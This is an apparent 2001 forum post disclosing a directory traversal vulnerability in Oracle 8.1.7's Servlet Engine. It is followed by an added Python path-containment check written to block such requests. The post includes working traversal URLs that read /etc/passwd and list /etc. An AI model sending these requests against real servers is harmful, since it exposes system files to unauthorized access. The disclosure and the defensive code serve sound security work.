Security Vulnerability: Oracle Servlet Engine in 8.1.7 Database

Oct 27 2001
It seems Oracle Servlet Engine has a security hole.
$ORACLE_HOME=/u0/oracle
Release 8.1.7.X default installation
Oracle Servlet Engine configured in init.ora as
mts_dispatchers = "(ADDRESS=(PROTOCOL=TCP)(HOST=srv)
(PORT=8000))(DISP=1)(PRE=http://admin)"
(It is also possible to configure it as in the documentation:
$ORACLE_HOME/Apache/Apache/htdocs/mod_ose.html).
OSE works fine and I see the "flying pig" on http://srv:8000
It is possible to show all contents of the server's directory structure
available to the Oracle user:

http://srv:8000/../../../../../../../../../../etc/passwd
http://srv:8000/../../../../../../../../../../etc/
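
As an added example (not part of the original post and not Oracle's code): a containment check of the kind a server has to apply before mapping request paths like the two above to files. The document root `/u0/oracle/webroot` and the function name `resolve_under_root` are assumptions made for this illustration.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Hypothetical document root, constructed for this example (not from the post).
DOCROOT = "/u0/oracle/webroot"


def resolve_under_root(url, docroot=DOCROOT):
    """Map a request URL to a path under docroot; return None if it would escape."""
    path = urlsplit(url).path  # urlsplit does not collapse ".." segments

    # Decode until stable so encoded or double-encoded dots and slashes are
    # seen in their final form; refuse input that is still changing after 3 rounds.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        return None

    if "\x00" in path:
        return None  # NUL bytes can truncate paths in lower layers
    path = path.replace("\\", "/")  # treat both separators alike

    # Reject any ".." segment outright rather than trusting normalization alone.
    segments = [s for s in path.split("/") if s not in ("", ".")]
    if ".." in segments:
        return None

    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, *segments))

    # Second, independent check: the result must still sit inside the root.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for u in ("http://srv:8000/index.html",
              "http://srv:8000/../../../../../../../../../../etc/passwd",
              "http://srv:8000/../../../../../../../../../../etc/"):
        print(u, "->", resolve_under_root(u))
```

This check is purely lexical; a server that follows symbolic links would also need to compare the resolved real path against the root.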
Locked on Nov 24 2001
Added on Oct 27 2001